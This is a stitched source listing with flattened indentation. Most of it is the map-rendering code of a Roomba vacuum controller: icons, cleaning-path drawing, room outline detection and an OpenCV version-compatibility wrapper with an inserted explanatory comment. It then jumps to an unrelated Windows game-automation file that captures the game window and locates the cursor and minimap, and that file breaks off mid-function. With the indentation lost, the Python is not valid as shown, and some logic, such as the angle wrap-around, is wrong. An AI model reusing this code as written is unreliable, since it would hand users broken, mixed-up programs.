self.current_state = self.states["charge"]
else:
self.current_state = self.states[self.cleanMissionStatus_phase]
if new_state is not None:
self.current_state = self.states[new_state]
self.log.info("set current state to: %s" % (self.current_state))
if self.current_state != current_mission:
self.log.info("updated state to: %s" % (self.current_state))
self.publish("state", self.current_state)
self.draw_map(current_mission != self.current_state)
def make_transparent(self, image, colour=None):
'''
take image and make white areas transparent
return transparent image
'''
image = image.convert("RGBA")
datas = image.getdata()
newData = []
for item in datas:
# white (ish)
if item[0] >= 254 and item[1] >= 254 and item[2] >= 254:
newData.append(self.transparent)
else:
if colour:
newData.append(colour)
else:
newData.append(item)
image.putdata(newData)
return image
def make_icon(self, input="./roomba.png", output="./roomba_mod.png"):
#utility function to make roomba icon from generic roomba icon
if not HAVE_PIL: #drawing library loaded?
self.log.error("PIL module not loaded")
return None
try:
roomba = Image.open(input).convert('RGBA')
roomba = roomba.rotate(90, expand=False)
roomba = self.make_transparent(roomba)
draw_wedge = ImageDraw.Draw(roomba)
draw_wedge.pieslice(
[(5,0),(roomba.size[0]-5,roomba.size[1])],
175, 185, fill="red", outline="red")
roomba.save(output, "PNG")
return roomba
except Exception as e:
self.log.error("ERROR: %s" % e)
return None
def load_icon(self, filename="", icon_name=None, fnt=None, size=(32,32),
base_icon=None):
'''
Load icon from file, or draw icon if file not found.
returns icon object
'''
if icon_name is None:
return None
try:
icon = Image.open(filename).convert('RGBA').resize(
size,Image.ANTIALIAS)
icon = self.make_transparent(icon)
except IOError as e:
self.log.warn("error loading %s: %s, using default icon instead"
% (icon_name,e))
if base_icon is None:
icon = Image.new('RGBA', size, self.transparent)
else:
icon = base_icon
draw_icon = ImageDraw.Draw(icon)
if icon_name == "roomba":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
355, 5, fill="red", outline="red")
elif icon_name == "stuck":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
draw_icon.polygon([(
icon.size[0]//2,icon.size[1]), (0, 0), (0,icon.size[1])],
fill = 'red')
if fnt is not None:
draw_icon.text((4,-4), "!", font=fnt,
fill=(255,255,255,255))
elif icon_name == "cancelled":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
if fnt is not None:
draw_icon.text((4,-4), "X", font=fnt, fill=(255,0,0,255))
elif icon_name == "bin full":
draw_icon.rectangle([
icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10, icon.size[1]+10],
fill = "grey")
if fnt is not None:
draw_icon.text((4,-4), "F", font=fnt,
fill=(255,255,255,255))
elif icon_name == "battery":
draw_icon.rectangle([icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10,icon.size[1]+10], fill = "orange")
if fnt is not None:
draw_icon.text((4,-4), "B", font=fnt,
fill=(255,255,255,255))
elif icon_name == "home":
draw_icon.rectangle([0,0,32,32], fill="red", outline="black")
if fnt is not None:
draw_icon.text((4,-4), "D", font=fnt,
fill=(255,255,255,255))
else:
icon = None
#rotate icon 180 degrees
icon = icon.rotate(180-self.angle, expand=False)
return icon
def initialise_map(self, roomba_size):
'''
Initialize all map items (base maps, overlay, icons fonts etc)
'''
# get base image of Roomba path
if self.base is None:
'''try:
self.log.info("MAP: openening existing line image")
self.base = Image.open(
self.mapPath + '/' + self.roombaName + 'lines.png')\
.convert('RGBA')
if self.base.size != (self.mapSize[0], self.mapSize[1]):
raise IOError("Image is wrong size")
except IOError as e:
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.log.warn("MAP: line image problem: %s: created new image"
% e)
try:
self.log.info("MAP: openening existing problems image")
self.roomba_problem = Image.open(
self.mapPath + '/'+self.roombaName + 'problems.png')\
.convert('RGBA')
if self.roomba_problem.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: problems image problem: %s: created new "
"image" % e)'''
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
try:
self.log.info("MAP: openening existing map no text image")
self.previous_map_no_text = None
self.map_no_text = Image.open(
self.mapPath + '/' + self.roombaName + 'map_notext.png')\
.convert('RGBA')
if self.map_no_text.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.map_no_text = None
self.log.warn("MAP: map no text image problem: %s: set to None"
% e)
# save x and y center of image, for centering of final map image
self.cx = self.base.size[0]
self.cy = self.base.size[1]
# get a font
if self.fnt is None:
try:
self.fnt = ImageFont.truetype('FreeMono.ttf', 40)
except IOError as e:
self.log.warn("error loading font: %s, loading default font"
% e)
self.fnt = ImageFont.load_default()
#set dock home position
if self.home_pos is None:
self.home_pos = (
self.mapSize[0] // 2 + self.mapSize[2],
self.mapSize[1] // 2 + self.mapSize[3])
self.log.info("MAP: home_pos: (%d,%d)"
% (self.home_pos[0], self.home_pos[1]))
#get icons
if self.roomba_icon is None:
self.roomba_icon = self.load_icon(
filename=self.roomba_icon_file, icon_name="roomba",
fnt=self.fnt, size=roomba_size, base_icon=None)
if self.roomba_error_icon is None:
self.roomba_error_icon = self.load_icon(
filename=self.roomba_error_file, icon_name="stuck",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_cancelled_icon is None:
self.roomba_cancelled_icon = self.load_icon(
filename=self.roomba_cancelled_file, icon_name="cancelled",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_battery_icon is None:
self.roomba_battery_icon = self.load_icon(
filename=self.roomba_battery_file, icon_name="battery",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.dock_icon is None and self.home_icon_file is not None:
self.dock_icon = self.load_icon(
filename=self.home_icon_file, icon_name="home", fnt=self.fnt)
self.dock_position = (
self.home_pos[0] - self.dock_icon.size[0] // 2,
self.home_pos[1] - self.dock_icon.size[1] // 2)
if self.bin_full_icon is None:
self.bin_full_icon = self.load_icon(
filename=self.bin_full_file, icon_name="bin full",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
self.log.info("MAP: Initialisation complete")
def transparent_paste(self, base_image, icon, position):
'''
        needed because PIL pasting of transparent images gives weird results
'''
image = Image.new('RGBA', self.base.size, self.transparent)
image.paste(icon,position)
base_image = Image.alpha_composite(base_image, image)
return base_image
def zero_coords(self):
'''
returns dictionary with default zero coords
'''
return {"x": 0, "y": 0, "theta": 180}
def offset_coordinates(self, old_co_ords, new_co_ords):
'''
offset coordinates according to mapSize settings, with 0,0 as center
'''
x_y = (new_co_ords["x"] + self.mapSize[0] // 2 + self.mapSize[2],
new_co_ords["y"] + self.mapSize[1] // 2 + self.mapSize[3])
old_x_y = (old_co_ords["x"]+self.mapSize[0] // 2 + self.mapSize[2],
old_co_ords["y"]+self.mapSize[1]//2+self.mapSize[3])
theta = int(new_co_ords["theta"] - 90 + self.roomba_angle)
while theta > 359: theta = 360 - theta
while theta < 0: theta = 360 + theta
return old_x_y, x_y, theta
def get_roomba_pos(self, x_y):
'''
calculate roomba position as list
'''
return [x_y[0] - self.roomba_icon.size[0] // 2,
x_y[1] - self.roomba_icon.size[1] // 2,
x_y[0] + self.roomba_icon.size[0] // 2,
x_y[1] + self.roomba_icon.size[1] // 2]
def draw_vacuum_lines(self, image, old_x_y, x_y, theta):
'''
        draw lines on image from old_x_y to x_y representing vacuum coverage,
taking into account angle theta (roomba angle).
'''
lines = ImageDraw.Draw(image)
if x_y != old_x_y:
self.log.info("MAP: drawing line: %s, %s" % (old_x_y, x_y))
lines.line([old_x_y, x_y], fill=self.fillColor,
width=self.roomba_icon.size[0] // 2)
#draw circle over roomba vacuum area to give smooth edges.
arcbox = [x_y[0]-self.roomba_icon.size[0] // 4,
x_y[1]-self.roomba_icon.size[0] // 4,
x_y[0]+self.roomba_icon.size[0] // 4,
x_y[1]+self.roomba_icon.size[0] // 4]
lines.ellipse(arcbox, fill=self.fillColor)
def draw_text(self, image, display_text, fnt, pos=(0,0),
colour=(0,0,255,255), rotate=False):
#draw text - (WARNING old versions of PIL have huge memory leak here!)
if display_text is None: return
self.log.info("MAP: writing text: pos: %s, text: %s"
% (pos, display_text))
if rotate:
txt = Image.new('RGBA', (fnt.getsize(display_text)),
self.transparent)
text = ImageDraw.Draw(txt)
# draw text rotated 180 degrees...
text.text((0,0), display_text, font=fnt, fill=colour)
image.paste(txt.rotate(180-self.angle, expand=True), pos)
else:
text = ImageDraw.Draw(image)
text.text(pos, display_text, font=fnt, fill=colour)
def draw_map(self, force_redraw=False):
'''
Draw map of Roomba cleaning progress
'''
if ((self.co_ords != self.previous_co_ords or
self.cleanMissionStatus_phase !=
self.previous_cleanMissionStatus_phase)
or force_redraw) and self.drawmap:
self.render_map(self.co_ords, self.previous_co_ords)
self.previous_co_ords = self.co_ords.copy()
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
def render_map(self, new_co_ords, old_co_ords):
'''
draw map
'''
draw_final = False
stuck = False
cancelled = False
bin_full = False
battery_low = False
# program just started, and we don't have phase yet.
if self.current_state is None:
return
if self.show_final_map == False:
self.log.info("MAP: received: new_co_ords: %s old_co_ords: %s "
"phase: %s, state: %s" % (
new_co_ords, old_co_ords,
self.cleanMissionStatus_phase, self.current_state))
if self.current_state == self.states["charge"]:
self.log.info("MAP: ignoring new co-ords in charge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Charging: Battery: " + \
str(self.master_state["state"]["reported"]["batPct"]) + "%"
if self.bin_full:
self.display_text = "Bin Full," + \
self.display_text.replace("Charging", "Not Ready")
if (self.last_completed_time is None or time.time() -
self.last_completed_time > 3600):
self.save_text_and_map_on_whitebg(self.map_no_text)
draw_final = True
elif self.current_state == self.states["recharge"]:
self.log.info("MAP: ignoring new co-ords in recharge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Recharging:" + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["rechrgM"]) + "m"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["pause"]:
self.log.info("MAP: ignoring new co-ords in pause phase")
new_co_ords = old_co_ords
self.display_text = "Paused: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
# assume roomba is docked...
new_co_ords = old_co_ords = self.zero_coords()
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["hmPostMsn"]:
self.display_text = "Completed: " + \
time.strftime("%a %b %d %H:%M:%S")
self.log.info("MAP: end of mission")
elif self.current_state == self.states["dockend"]:
self.log.info("MAP: mission completed: ignoring new co-ords in "
"docking phase")
new_co_ords = old_co_ords = self.zero_coords()
self.draw_final_map(True)
draw_final = True
elif (self.current_state == self.states["run"] or
self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]):
if self.current_state == self.states["run"]:
self.display_text = self.states["run"] + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
else:
self.display_text = None
self.show_final_map = False
elif self.current_state == self.states["new"]:
self.angle = self.mapSize[4] #reset angle
self.base = Image.new('RGBA', self.base.size, self.transparent)
# overlay for roomba problem position
self.roomba_problem = Image.new('RGBA', self.base.size,
self.transparent)
self.show_final_map = False
self.display_text = None
self.log.info("MAP: created new image at start of new run")
elif self.current_state == self.states["stuck"]:
self.display_text = "STUCK!: " + time.strftime("%a %b %d %H:%M:%S")
self.draw_final_map(True)
draw_final = True
stuck = True
elif self.current_state == self.states["cancelled"]:
self.display_text = "Cancelled: " + \
time.strftime("%a %b %d %H:%M:%S")
cancelled = True
elif self.current_state == self.states["dock"]:
self.display_text = "Docking"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
bin_full = True
else:
self.display_text = "Battery low: " + \
str(self.master_state["state"]["reported"]["batPct"]) + \
"%, " + self.display_text
battery_low = True
else:
self.log.warn("MAP: no special handling for state: %s"
% self.current_state)
if self.base is None:
self.log.warn("MAP: no image, exiting...")
return
if self.display_text is None:
self.display_text = self.current_state
if self.show_final_map: #just display final map - not live
self.log.debug("MAP: not updating map - Roomba not running")
return
if self.debug:
# debug final map (careful, uses a lot of CPU power!)
self.draw_final_map()
#calculate co-ordinates, with 0,0 as center
old_x_y, x_y, theta = self.offset_coordinates(old_co_ords, new_co_ords)
roomba_pos = self.get_roomba_pos(x_y)
self.log.info("MAP: old x,y: %s new x,y: %s theta: %s roomba pos: %s" %
(old_x_y, x_y, theta, roomba_pos))
#draw lines
self.draw_vacuum_lines(self.base, old_x_y, x_y, theta)
# make a blank image for the text and Roomba overlay, initialized to
# transparent text color
roomba_sprite = Image.new('RGBA', self.base.size, self.transparent)
#draw roomba
self.log.info("MAP: drawing roomba: pos: %s, theta: %s"
% (roomba_pos, theta))
has_problems = False
if stuck:
self.log.info("MAP: Drawing stuck Roomba")
self.roomba_problem.paste(self.roomba_error_icon,roomba_pos)
has_problems = True
if cancelled:
self.log.info("MAP: Drawing cancelled Roomba")
self.roomba_problem.paste(self.roomba_cancelled_icon,roomba_pos)
has_problems = True
if bin_full:
self.log.info("MAP: Drawing full bin")
self.roomba_problem.paste(self.bin_full_icon,roomba_pos)
has_problems = True
if battery_low:
self.log.info("MAP: Drawing low battery Roomba")
self.roomba_problem.paste(self.roomba_battery_icon,roomba_pos)
has_problems = True
roomba_sprite = self.transparent_paste(
roomba_sprite,
self.roomba_icon.rotate(theta, expand=False), roomba_pos)
# paste dock over roomba_sprite
if self.dock_icon is not None:
roomba_sprite = self.transparent_paste(
roomba_sprite, self.dock_icon, self.dock_position)
'''# save base lines
self.base.save(self.mapPath + '/' + self.roombaName + 'lines.png',
"PNG")
# save problem overlay
self.roomba_problem.save(self.mapPath + '/' + self.roombaName + \
'problems.png', "PNG")'''
if self.roomOutline or self.auto_rotate:
# draw room outline (saving results if this is a final map) update
# x,y and angle if auto_rotate
self.draw_room_outline(draw_final)
# merge room outline into base
if self.roomOutline:
#if we want to draw the room outline
out = Image.alpha_composite(self.base, self.room_outline)
else:
out = self.base
#merge roomba lines (trail) with base
out = Image.alpha_composite(out, roomba_sprite)
if has_problems:
#merge problem location for roomba into out
out = Image.alpha_composite(out, self.roomba_problem)
if draw_final and self.auto_rotate:
#translate image to center it if auto_rotate is on
self.log.info("MAP: calculation of center: (%d,%d), "
"translating final map to center it, x:%d, y:%d "
"deg: %.2f" % (
self.cx, self.cy, self.cx - out.size[0] // 2,
self.cy - out.size[1] // 2,
self.angle))
out = out.transform(
out.size, Image.AFFINE,
(1, 0, self.cx-out.size[0] // 2,
0, 1, self.cy-out.size[1] // 2))
# map is upside down, so rotate 180 degrees, and size to fit (NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0)
#out_rotated = out.rotate(180 + self.angle, expand=True).resize(self.base.size) #old version
out_rotated = out.rotate(180, expand=False)
# save composite image
self.save_text_and_map_on_whitebg(out_rotated)
if draw_final:
self.show_final_map = True # prevent re-drawing of map until reset
def save_text_and_map_on_whitebg(self, map):
# if no map or nothing changed
if map is None or (map == self.previous_map_no_text and
self.previous_display_text == self.display_text):
return
self.map_no_text = map
self.previous_map_no_text = self.map_no_text
self.previous_display_text = self.display_text
self.map_no_text.save(self.mapPath + '/' + self.roombaName +
'map_notext.png', "PNG")
if( self.enableMapWithText ):
final = Image.new('RGBA', self.base.size, (255,255,255,255)) # white
# paste onto a white background, so it's easy to see
final = Image.alpha_composite(final, map)
final = final.rotate(self.angle, expand=True) #(NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0 - moved rotate to here)
# draw text
self.draw_text(final, self.display_text, self.fnt)
final.save(self.mapPath + '/'+self.roombaName + '_map.png', "PNG")
# try to avoid other programs reading file while writing it,
# rename should be atomic.
os.rename(self.mapPath + '/' + self.roombaName + '_map.png',
self.mapPath + '/' + self.roombaName + 'map.png')
def ScaleRotateTranslate(self, image, angle, center=None, new_center=None,
scale=None, expand=False):
'''
experimental - not used yet
'''
if center is None:
return image.rotate(angle, expand)
angle = -angle / 180.0 * math.pi
nx, ny = x, y = center
if new_center != center:
(nx, ny) = new_center
sx = sy = 1.0
if scale:
(sx, sy) = scale
cosine = math.cos(angle)
sine = math.sin(angle)
a = cosine / sx
b = sine / sx
c = x - nx * a - ny * b
d = -sine / sy
e = cosine / sy
f = y - nx * d - ny * e
return image.transform(image.size, Image.AFFINE,
(a,b,c,d,e,f), resample=Image.BICUBIC)
def match_outlines(self, orig_image, skewed_image):
orig_image = np.array(orig_image)
skewed_image = np.array(skewed_image)
try:
surf = cv2.xfeatures2d.SURF_create(400)
except Exception:
surf = cv2.SIFT(400)
kp1, des1 = surf.detectAndCompute(orig_image, None)
kp2, des2 = surf.detectAndCompute(skewed_image, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m, n in matches:
if m.distance < 0.7 * n.distance:
good.append(m)
MIN_MATCH_COUNT = 10
if len(good) > MIN_MATCH_COUNT:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good
]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good
]).reshape(-1, 1, 2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
# see https://ch.mathworks.com/help/images/examples/find-image-rotation-and-scale-using-automated-feature-matching.html for details
ss = M[0, 1]
sc = M[0, 0]
scaleRecovered = math.sqrt(ss * ss + sc * sc)
thetaRecovered = math.atan2(ss, sc) * 180 / math.pi
self.log.info("MAP: Calculated scale difference: %.2f, "
"Calculated rotation difference: %.2f" %
(scaleRecovered, thetaRecovered))
#deskew image
im_out = cv2.warpPerspective(skewed_image, np.linalg.inv(M),
(orig_image.shape[1], orig_image.shape[0]))
return im_out
else:
self.log.warn("MAP: Not enough matches are found - %d/%d"
% (len(good), MIN_MATCH_COUNT))
return skewed_image
def draw_room_outline(self, overwrite=False):
'''
draw room outline
'''
self.log.info("MAP: checking room outline")
if HAVE_CV2:
if self.room_outline_contour is None or overwrite:
try:
self.room_outline_contour = np.load(
self.mapPath + '/' + self.roombaName + 'room.npy')
except IOError as e:
self.log.warn("Unable to load room outline: %s, setting "
"to 0" % e)
self.room_outline_contour = np.array(
[(0,0),(0,0),(0,0),(0,0)], dtype=np.int)
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
room_outline_area = cv2.contourArea(self.room_outline_contour)
# edgedata = cv2.add(
# np.array(self.base.convert('L'), dtype=np.uint8),
# np.array(self.room_outline.convert('L'), dtype=np.uint8))
edgedata = np.array(self.base.convert('L'))
# find external contour
_, contours, _ = self.findContours(
edgedata,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if contours[0] is None: return
if len(contours[0]) < 5: return
max_area = cv2.contourArea(contours[0])
# experimental shape matching
# note cv2.cv.CV_CONTOURS_MATCH_I1 does not exist in CV 3.0,
# so just use 1
match = cv2.matchShapes(
self.room_outline_contour,contours[0],1,0.0)
self.log.info("MAP: perimeter/outline match is: %.4f" % match)
# if match is less than 0.35 - shapes are similar (but if it's 0 -
# then they are the same shape..) try auto rotating map to fit.
if match < 0.35 and match > 0:
#self.match_outlines(self.room_outline, self.base)
pass
if max_area > room_outline_area:
self.log.info("MAP: found new outline perimiter")
self.room_outline_contour = contours[0]
perimeter = cv2.arcLength(self.room_outline_contour,True)
outline = Image.new('RGBA',self.base.size,self.transparent)
edgeimage = np.array(outline) # make blank RGBA image array
# self.draw_edges is the max deviation from a line (set to 0.3%)
# you can fiddle with this
approx = cv2.approxPolyDP(
self.room_outline_contour,
self.draw_edges * perimeter,
True)
# outline with grey, width 1
cv2.drawContours(edgeimage,[approx] , -1, self.outlineColor, self.outlineWidth)
self.room_outline = Image.fromarray(edgeimage)
else:
if self.room_outline is None or overwrite:
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
edges = ImageOps.invert(self.room_outline.convert('L'))
edges.paste(self.base)
edges = edges.convert('L').filter(ImageFilter.SMOOTH_MORE)
edges = ImageOps.invert(edges.filter(ImageFilter.FIND_EDGES))
self.room_outline = self.make_transparent(edges, (0, 0, 0, 255))
if overwrite or self.debug:
# save room outline
self.room_outline.save(
self.mapPath+'/'+self.roombaName+'room.png', "PNG")
if HAVE_CV2:
# save room outline contour as numpy array
np.save(self.mapPath + '/' + self.roombaName + 'room.npy',
self.room_outline_contour)
if self.auto_rotate:
# update outline centre
self.get_image_parameters(
image=self.room_outline, contour=self.room_outline_contour,
final=overwrite)
self.log.info("MAP: calculation of center: (%d,%d), "
"translating room outline to center it, "
"x:%d, y:%d deg: %.2f" % (
self.cx, self.cy,
self.cx - self.base.size[0] // 2,
self.cy - self.base.size[1] // 2,
self.angle))
# center room outline, same as map.
self.room_outline = self.room_outline.transform(
self.base.size, Image.AFFINE,
(1, 0, self.cx - self.base.size[0] // 2,
0, 1, self.cy-self.base.size[1]//2))
self.log.info("MAP: Wrote new room outline files")
def PIL_get_image_parameters(self, image=None, start=90, end = 0, step=-1,
recursion=0):
'''
updates angle of image, and centre using PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is PIL image
'''
if image is not None and HAVE_PIL:
imbw = image.convert('L')
max_area = self.base.size[0] * self.base.size[1]
x_y = (self.base.size[0] // 2, self.base.size[1] // 2)
angle = self.angle
div_by_10 = False
if step >=10 or step <=-10:
step /= 10
div_by_10 = True
for try_angle in range(start, end, step):
if div_by_10:
try_angle /= 10.0
#rotate image and resize to fit
im = imbw.rotate(try_angle, expand=True)
box = im.getbbox()
if box is not None:
area = (box[2]-box[0]) * (box[3]-box[1])
if area < max_area:
angle = try_angle
x_y = ((box[2] - box[0]) // 2 + box[0],
(box[3] - box[1]) // 2 + box[1])
max_area = area
if recursion >= 1:
return x_y, angle
x_y, angle = self.PIL_get_image_parameters(
image,
(angle + 1) * 10,
(angle - 1) * 10, -10,
recursion + 1)
# self.log.info("MAP: PIL: image center: "
# "x:%d, y:%d, angle %.2f" % (x_y[0], x_y[1], angle))
return x_y, angle
def get_image_parameters(self, image=None, contour=None, final=False):
'''
updates angle of image, and centre using cv2 or PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is cv2 contour or PIL image
        routines find the minimum area rectangle that fits the image outline
'''
if contour is not None and HAVE_CV2:
            # find minimum area rectangle that fits
# returns (x,y), (width, height), theta - where (x,y) is the center
x_y,l_w,angle = cv2.minAreaRect(contour)
elif image is not None and HAVE_PIL:
x_y, angle = self.PIL_get_image_parameters(image)
else:
return
if angle < self.angle - 45:
angle += 90
if angle > 45-self.angle:
angle -= 90
if final:
self.cx = x_y[0]
self.cy = x_y[1]
self.angle = angle
self.log.info("MAP: image center: x:%d, y:%d, angle %.2f" %
(x_y[0], x_y[1], angle))
def angle_between(self, p1, p2):
'''
clockwise angle between two points in degrees
'''
if HAVE_CV2:
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return np.rad2deg((ang1 - ang2) % (2 * np.pi))
else:
side1=math.sqrt(((p1[0] - p2[0]) ** 2))
side2=math.sqrt(((p1[1] - p2[1]) ** 2))
return math.degrees(math.atan(side2/side1))
def findContours(self,image,mode,method):
'''
Version independent find contours routine. Works with OpenCV 2 or 3 or 4.
Returns modified image (with contours applied), contours list, hierarchy
'''
ver = int(cv2.__version__.split(".")[0])
im = image.copy()
if ver == 2 or ver == 4: #NW fix for OpenCV V4 21st Dec 2018
contours, hierarchy = cv2.findContours(im,mode,method)
return im, contours, hierarchy
else:
im_cont, contours, hierarchy = cv2.findContours(im,mode,method)
return im_cont, contours, hierarchy
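# Background note (added for clarity): OpenCV 2.x and 4.x return
# (contours, hierarchy) from cv2.findContours(), while OpenCV 3.x returns
# (image, contours, hierarchy). The wrapper above hides that difference.
# A hedged, version-agnostic alternative seen in many projects:
#
#   >>> res = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#   >>> contours, hierarchy = res if len(res) == 2 else res[1:]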
def draw_final_map(self, overwrite=False):
'''
draw map with outlines at end of mission. Called when mission has
finished and Roomba has docked
'''
merge = Image.new('RGBA',self.base.size,self.transparent)
if HAVE_CV2:
# NOTE: this is CPU intensive!
edgedata = np.array(self.base.convert('L'), dtype=np.uint8)
# find all contours
_, contours, _ = self.findContours(
edgedata,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# zero edge data for later use
edgedata.fill(0)
max_perimeter = 0
max_contour = None
for cnt in contours:
perimeter = cv2.arcLength(cnt,True)
if perimeter >= max_perimeter:
max_contour = cnt # get the contour with maximum length
max_perimeter = perimeter
if max_contour is None: return
if len(max_contour) < 5: return
try:
contours.remove(max_contour) # remove max contour from list
except ValueError:
self.log.warn("MAP: unable to remove contour")
pass
mask = np.full(edgedata.shape, 255, dtype=np.uint8) # white
# create mask (of other contours) in black
cv2.drawContours(mask,contours, -1, 0, -1)
# self.draw_edges is the max deviation from a line
# you can fiddle with this in enable_map
approx = cv2.approxPolyDP(max_contour,
self.draw_edges * max_perimeter,True)
bgimage = np.array(merge) # make blank RGBA image array
# draw contour and fill with "lawngreen"
cv2.drawContours(bgimage,[approx] , -1, (124, 252, 0, 255), -1)
# mask image with internal contours
bgimage = cv2.bitwise_and(bgimage,bgimage,mask = mask)
# not sure if you really need this - uncomment if you want the
# area outlined.
# draw longest contour approximated to lines (in black), width 1
cv2.drawContours(edgedata,[approx] , -1, (255), 1)
outline = Image.fromarray(edgedata) # outline
base = Image.fromarray(bgimage) # filled background image
else:
base = self.base.filter(ImageFilter.SMOOTH_MORE)
# draw edges at end of mission
outline = base.convert('L').filter(ImageFilter.FIND_EDGES)
# outline = ImageChops.subtract(
# base.convert('L').filter(ImageFilter.EDGE_ENHANCE),
# base.convert('L'))
edges = ImageOps.invert(outline)
edges = self.make_transparent(edges, (0, 0, 0, 255))
if self.debug:
edges.save(self.mapPath+'/'+self.roombaName+'edges.png', "PNG")
merge = Image.alpha_composite(merge,base)
merge = Image.alpha_composite(merge,edges)
if overwrite:
self.log.info("MAP: Drawing final map")
self.last_completed_time = time.time()
self.base=merge
if self.debug:
merge_rotated = merge.rotate(180+self.angle, expand=True)
merge_rotated.save(
self.mapPath+'/'+self.roombaName+'final_map.png', "PNG")
|
FindGameBasicInfo.py
|
# -*- coding: utf-8 -*-
import cv2
from cv2 import cv
import numpy as np
from matplotlib import pyplot as plt
from Tools import *
import win32gui
from PIL import ImageGrab
from PIL import Image
import win32con,win32api
import pythoncom, pyHook
import time
from DD import DD
import threading
import multiprocessing
from time import ctime,sleep
class GameBasicInfo(object):
def __init__(self):
self.map_name = ""
self.hero_location_info = [-1,-1]
self.minimap_location = [-1,-1]
self.isrun = True
self.game_hwnd = None
self.game_rect = []
self.client_rect = []
self.mapsizeinfo = read_mapsizeinfo("feature/map/mapsizeinfo.txt")
def start(self):
t = threading.Thread(target=self.do_update, args=())
t.start()
def stop(self):
self.isrun = False
def do_update(self):
self.isrun = True
self.game_hwnd = get_window_hwnd("WSGAME")
while self.isrun:
self.update()
pythoncom.PumpWaitingMessages()
time.sleep(0.01)
def update(self):
self.game_rect = win32gui.GetWindowRect(self.game_hwnd)
self.client_rect = win32gui.GetClientRect(self.game_hwnd)
image = get_window_rect_image(self.game_hwnd)
self.map_name, self.hero_location_info = get_coordinates(image)
# print mapname
# print "hero_location_info:",hero_location_info
################### find the cursor position
image_mouse = cv2.imread("feature/other/mouse.png")
image_mouse_mask = cv2.imread("feature/other/mouse_mask.png",0)
find_list = find_obj_hist_mask(image,image_mouse,mask=image_mouse_mask,max_sum=2.5,move_px = 5,move_py = 5)
if len(find_list) > 0:
#print find_list[0]
start_point = find_list[0][0]
#cv2.rectangle(image, (start_point[0], start_point[1]), (start_point[0]+10, start_point[1]+10), (0, 0, 255), 4)
## find the minimap region bounds
rect_location = [ find_list[0][0][0] - 34 , find_list[0][0][1] - 26-5 ,68,26]
#cv2.rectangle(image, (rect_location[0], rect_location[1]), (rect_location[0]+rect_location[2], rect_location[1]+rect_location[3]), (0, 255, 0), 2)
image_sub = get_image_sub(image,rect_location)
self.minimap_location = get_minimap_location(image_sub)
#print "minimap_location:",minimap_location
def task_go_point(self,x,y):
t = threading.Thread(target=self.go_point, args=(x,y))
t.start()
def go_point(self,x,y):
